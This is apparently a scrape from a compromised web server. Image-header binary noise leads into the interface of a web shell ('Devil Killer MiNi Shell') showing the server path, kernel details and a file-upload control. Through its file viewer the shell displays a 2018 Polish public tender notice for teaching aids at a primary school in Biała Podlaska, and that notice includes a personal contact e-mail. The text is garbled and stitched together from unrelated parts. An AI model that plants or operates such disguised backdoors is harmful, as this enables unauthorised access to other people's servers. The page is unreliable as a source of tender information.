JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180110/503662-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 503662-N-2018 z dnia 2018-01-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Szkoła Podstawowa nr 2 im. Bohaterskich Lotników Podlasia w Białej Podlaskiej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zakup, dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 2 w Białej Podlaskiej w ramach projektu pn.: ,, Od węgielka do diamentu" w podziale na dwa zadania.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Od węgielka do diamentu.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Szkoła Podstawowa nr 2 im. Bohaterskich Lotników Podlasia w Białej Podlaskiej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">000713562</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Akademicka</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">8</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">21-500</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Biała Podlaska</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubelskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">83 3433320</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">magda.ewa.korolczuk@gmail.com</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">83 </span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.sp2-biala-podlaska.eu </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.sp2-biala-podlaska.eu </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"> Szkoła Podstawowa nr 2 im. Bohaterskich Lotników Podlasia , 21-500 Biała Podlaska, ul. Akademicka 8, pok. 10 ( sekretariat)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zakup, dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 2 w Białej Podlaskiej w ramach projektu pn.: ,, Od węgielka do diamentu" w podziale na dwa zadania.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.2.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">2.	Zamówienie podzielone jest na dwie części:1)	zakup wraz z dostawą pomocy dydaktycznych - szczegółowy opis przedmiotu zamówienia wraz z wyspecyfikowaniem rodzaju i ilości asortymentów stanowiących przedmiot zamówienia zawiera załącznik nr 1 ( formularz cenowy) do siwz;2)	zakup wraz z dostawą pomocy dydaktycznych do języków obcych (j. angielski, j. rosyjski, j. niemiecki), podręczniki i poradniki (pozycje książkowe)- szczegółowy opis przedmiotu zamówienia wraz z wyspecyfikowaniem rodzaju i ilości asortymentów stanowiących przedmiot zamówienia zawiera załącznik nr 2 (formularz cenowy)do siwz;3.	Zamawiający informuje, iż umowa o zamówienie publiczne będzie zawarta odrębnie na każdą część.4.	Przedmiot zamówienia dotyczący zakupu i dostawy pomocy dydaktycznych obejmuje m.in. dostarczenie, załadunek, rozładunek przedmiotu umowy. Wszystkie materiały powinny być nowe, nie noszące śladów uszkodzeń zewnętrznych i uprzedniego używania tzn., że żadna część składająca się na dany materiał nie może być wcześniej używana, musi pochodzić z bieżącej produkcji, być sprawna i posiadać wyposażenie niezbędne do funkcjonalnego działania. Dostarczone artykuły muszą być odpowiednio zapakowane, aby zapobiec uszkodzeniu w czasie dostawy. Zamawiający wymaga, aby instrukcje do zamawianych towarów były w języku polskim.Wszystkie dostarczone pomoce muszą posiadać odpowiednie atesty, certyfikaty, świadectwa, jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem. Wyżej wskazane dokumenty należy załączyć do oferty. Pozostałe pomoce objęte są gwarancją w okresie wskazanym przez producenta pomocy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39162100-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">45</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa szczegółowo warunku w tym zakresie, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa szczegółowo warunku w tym zakresie, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie określa szczegółowo warunku w tym zakresie, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (art. 22 ust. 1b ustawy Pzp) oraz o nie podleganiu wykluczeniu (art. 24 ust. 1, ust. 5 pkt 1 ustawy Pzp) - wypełnione i podpisane przez wykonawcę, które stanowić będzie wstępne potwierdzenie spełnienia warunków udziału w postępowaniu oraz brak podstaw wykluczenia, zgodnie ze wzorem załącznik nr 6 do siwz.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (art. 22 ust. 1b ustawy Pzp) oraz o nie podleganiu wykluczeniu (art. 24 ust. 1, ust. 5 pkt 1 ustawy Pzp) - wypełnione i podpisane przez wykonawcę, które stanowić będzie wstępne potwierdzenie spełnienia warunków udziału w postępowaniu oraz brak podstaw wykluczenia, zgodnie ze wzorem załącznik nr 6 do siwz.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (art. 22 ust. 1b ustawy Pzp) oraz o nie podleganiu wykluczeniu (art. 24 ust. 1, ust. 5 pkt 1 ustawy Pzp) - wypełnione i podpisane przez wykonawcę, które stanowić będzie wstępne potwierdzenie spełnienia warunków udziału w postępowaniu oraz brak podstaw wykluczenia, zgodnie ze wzorem załącznik nr 6 do siwz.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp, </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span 